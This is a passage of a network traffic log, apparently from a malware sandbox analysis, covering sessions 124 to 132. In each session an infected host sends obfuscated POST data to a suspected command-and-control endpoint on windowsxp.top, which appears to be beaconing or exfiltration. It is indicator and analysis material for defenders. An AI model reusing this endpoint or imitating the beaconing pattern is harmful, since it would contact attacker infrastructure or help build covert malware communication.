                                                                                                                  124 | 192.168.2.4 | 50137 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:35.992871046 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:36.352576971 CET1012OUTData Raw: 50 56 5d 5b 5e 5f 53 52 54 58 57 54 54 56 5b 5f 59 5e 5b 51 52 56 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV][^_SRTXWTTV[_Y^[QRVRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&X4[!:56&4_9$'($8>;)<(V#!3/'>,!-/!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:36.597033978 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:36.890199900 CET | 767 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zd9t7cUSijzVXyteJXcqBZ7yyXCyvCJGsCJs6dYuL4QS5ubi0AXS1K5icLztvaFs0O7AgktrId3BTvHys5tQ7YuwF3rAinSR7aTv1B8Gh2vbl6OSmJs%2F8dnzwCrtlHqt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9545d284787-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1804&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=824601&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  125 | 192.168.2.4 | 50138 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:37.030648947 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:37.383734941 CET1012OUTData Raw: 50 51 5d 5e 5b 58 56 57 54 58 57 54 54 5d 5b 58 59 51 5b 58 52 57 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQ]^[XVWTXWTT][XYQ[XRWRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'%>+!9&66Z9$]$,.R(<< T,/=<*<9/!Y##X(
                                                                                                                  Oct 27, 2024 19:24:37.635092974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:38.053174019 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFl8rg9FQOM0A8kpCvk2wwsh%2BEv0U82PvDXljF8H3UjvdBG41ZUb8KvuIP5LeWR2Lj%2FuKNO%2Fzwr0N3%2BFPubeuPDeGgNsZ7%2BZTqwTI6QkwmYhmdpEwy3THmbnFAitbP2U"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b95addee83a4-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=611486&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  126 | 192.168.2.4 | 50139 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:37.110658884 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:37.461842060 CET1716OUTData Raw: 55 51 58 5d 5e 53 56 51 54 58 57 54 54 53 5b 58 59 50 5b 5c 52 56 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX]^SVQTXWTTS[XYP[\RVRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&.,[ *!"4\: X'^7/X<U(,7 ,='Z>,".!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:37.705276966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:38.041583061 CET | 919 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMokWOgVghcHDhSyNMYIQaTIjWYr98otN0RjLa5CIWAKMd9tfm72IZOvnXr44zQDMVAt1n%2BzuTLvwmxAJfER%2BlOof1sJQm8azC1BF0HIzMqswLqYI1wzzkELmrToklWs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b95b4abfeac1-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1098&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1315168&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 59 34 58 3f 0a 29 12 25 1c 2a 08 25 5f 30 2c 03 5d 3b 0c 0a 1c 2a 03 18 0e 2e 16 0c 57 27 0a 3a 18 3f 17 2b 03 37 3e 02 54 3e 25 21 5e 00 1c 24 03 22 00 25 56 27 3b 0a 5a 25 23 3c 5d 22 5b 37 5e 29 3d 3a 09 3f 07 20 5f 3c 06 0e 0d 38 06 3a 08 25 39 3e 13 38 06 03 07 3e 3a 2a 54 0c 14 22 03 2e 3f 3f 02 21 08 29 54 3d 0c 16 5d 27 3e 20 56 27 3a 24 53 29 3c 2f 59 28 2d 21 10 22 2c 01 00 2b 28 21 02 33 3e 2b 59 29 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Y4X?)%*%_0,];*.W':?+7>T>%!^$"%V';Z%#<]"[7^)=:? _<8:%9>8>:*T".??!)T=]'> V':$S)</Y(-!",+(!3>+Y)."T")S0YP0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  127 | 192.168.2.4 | 50140 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:38.182768106 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:38.539916039 CET1012OUTData Raw: 50 51 5d 58 5b 5f 56 5f 54 58 57 54 54 52 5b 53 59 5a 5b 5c 52 51 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQ]X[_V_TXWTTR[SYZ[\RQR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\1>' )=]!<Z-B $(?8,U=,'##^,-):.!Y##X(
                                                                                                                  Oct 27, 2024 19:24:38.792627096 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:38.999443054 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BI%2FAWxTMHYNE0UECs1LZdC2hxSpAh0nMLyTFTk%2F%2FHu%2Fl5Jss5vrLmO1YNPSq002%2Bl4F1EvLJLudbRj9uNG90KO0hCerRQEKKT7NKq3loI5AGQdpE83I7NnfXPlsZCK0n"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b96219820c1b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1124223&cwnd=75&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  128 | 192.168.2.4 | 50141 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:39.165503979 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:39.524322987 CET1012OUTData Raw: 50 57 58 5d 5b 5e 53 57 54 58 57 54 54 57 5b 5c 59 5f 5b 5f 52 5e 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX][^SWTXWTTW[\Y_[_R^R_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&4!\)Y#&$[:$X'$V,(T),+#";Y/?[>:^,?!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:39.762197971 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:39.974361897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:40.057790041 CET | 778 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JPJesI%2FGYuHstXZQ%2FlLodoEcQ69oN525Wcoc24qkg5tpbGVRB6QGf1AvrEg7%2FUbChmXXS3BRDoTPRFbJAArI%2FMnG6j%2FbbwK%2BRYpLuMHATNPI7fD2s4VJax674RNwDYs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9682ca12d2b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1390&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1058479&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  129 | 192.168.2.4 | 50142 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:40.186578989 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:40.543329000 CET  1012               OUT        Data Raw: 50 55 5d 5e 5e 5f 53 57 54 58 57 54 54 51 5b 5f 59 59 5b 5c 52 5f 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PU]^^_SWTXWTTQ[_YY[\R_R\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']%$_":5;94_'<P8$S><?#"'Z8-X=.X./!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:40.792278051 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:40.989537954 CET  775                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47NGGnZMfy%2Bv3N74kEybuGvabauPl95ko%2F7G8ncwqYwr91c%2FE6%2BHjT3hnA11nm3pQNLRFcIW34jek4JD1zHVB1YRMuNZWZdS3earLzlCbNxbpe2fKsvQ6P88Wimj%2BOd9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b96e9fb5477c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=825071&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  130         192.168.2.4  50143        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:41.123420954 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:41.477436066 CET  1012               OUT        Data Raw: 55 51 58 5b 5b 5c 56 5e 54 58 57 54 54 5d 5b 5f 59 5a 5b 50 52 53 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX[[\V^TXWTT][_YZ[PRSR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y&,5#&?-4,]$78')7$8.4*,),/!Y##X(
                                                                                                                  Oct 27, 2024 19:24:41.733697891 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:42.065052032 CET  777                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PphdoQCZVMkQMeM3XoBM4V7Xw5vhLYa3I1IL%2F4SpHwZ9OCrUBIBUBIYL2xlzy%2BvyZjxO%2FEiyBfvh%2FpRBa8tId8JTf2cK6KKF5sKgD%2F10Pjp4IWcwdsjgo6kuK%2Fd50Wih"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9747b1b2c9f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1158&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1296329&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  131         192.168.2.4  50144        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:42.364132881 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:42.715358973 CET  1012               OUT        Data Raw: 50 55 58 5b 5b 5c 56 54 54 58 57 54 54 53 5b 5e 59 5f 5b 51 52 54 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUX[[\VTTXWTTS[^Y_[QRTRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%= 6"65?:$#0?/S)##28-*?:[-!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:42.984479904 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:43.290718079 CET  772                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BMnnd5SFWGBwUsbm5mX2S8jj%2Bpco1T3ocgRL3BKBhrxDj1hKQIRZT851q1rrBDeglu9Nn2yHEWKZmLiChMLk%2FsQgE1jWdGkTp0f%2FOFcrOEjKIE3TUZ1lgiBxOIkmciTe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b97c4bcb2d39-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1136&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1243986&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  132         192.168.2.4  50145        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:43.069143057 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1704
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:43.415075064 CET  1704               OUT        Data Raw: 50 52 5d 5c 5e 5c 56 54 54 58 57 54 54 55 5b 5e 59 5b 5b 58 52 57 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR]\^\VTTXWTTU[^Y[[XRWRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'>,"5!$^97,08 W/7(,<4/_8=4**Z./!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:43.667609930 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:43.871519089 CET  917                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=70KON6bOkWuSdUt51jbBNeTOgIZQInIt7GYOfazvZpeCfbxl3sZzVNfj4n58JMDZ2fdloS7cWuKz9%2FRHldGTQ8eolX3XwxzBiDybYCG74i5qsD1y3AD2vuKuC9Eh6Dsi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9808f20e7c7-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1374&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2025&delivery_rate=1097801&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
